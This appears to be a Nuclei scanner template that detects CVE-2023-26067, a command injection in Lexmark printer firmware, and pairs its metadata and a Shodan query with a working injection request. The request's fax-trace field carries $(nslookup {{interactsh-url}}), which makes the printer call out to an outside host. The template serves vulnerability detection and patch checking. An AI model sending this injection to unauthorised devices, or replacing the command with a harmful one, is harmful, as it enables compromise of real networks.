id: CVE-2023-26067 info: name: Lexmark Printers - Command Injection author: DhiyaneshDK severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). remediation: | Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/ - https://github.com/horizon3ai/CVE-2023-26067 - https://nvd.nist.gov/vuln/detail/CVE-2023-26067 - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf - https://support.lexmark.com/alerts/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.02289 epss-percentile: 0.88426 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lexmark product: cxtpc_firmware shodan-query: "Server: Lexmark_Web_Server" tags: cve,cve2023,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' http: - raw: - | POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Length: 49 FT_Custom_lbtrace=$({{cmd}}) matchers: - type: dsl dsl: - contains(interactsh_protocol, 'dns') - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and # digest: 4a0a0047304502200ca720c19b69d11e783a9db5bca194ad37262911518a04fa08aa225dd68cca9a022100cced666615e93db72377248f5a8607c6cf13a86df01df4ac742147e19729e7a7:922c64590222798bb761d5b6d8e72950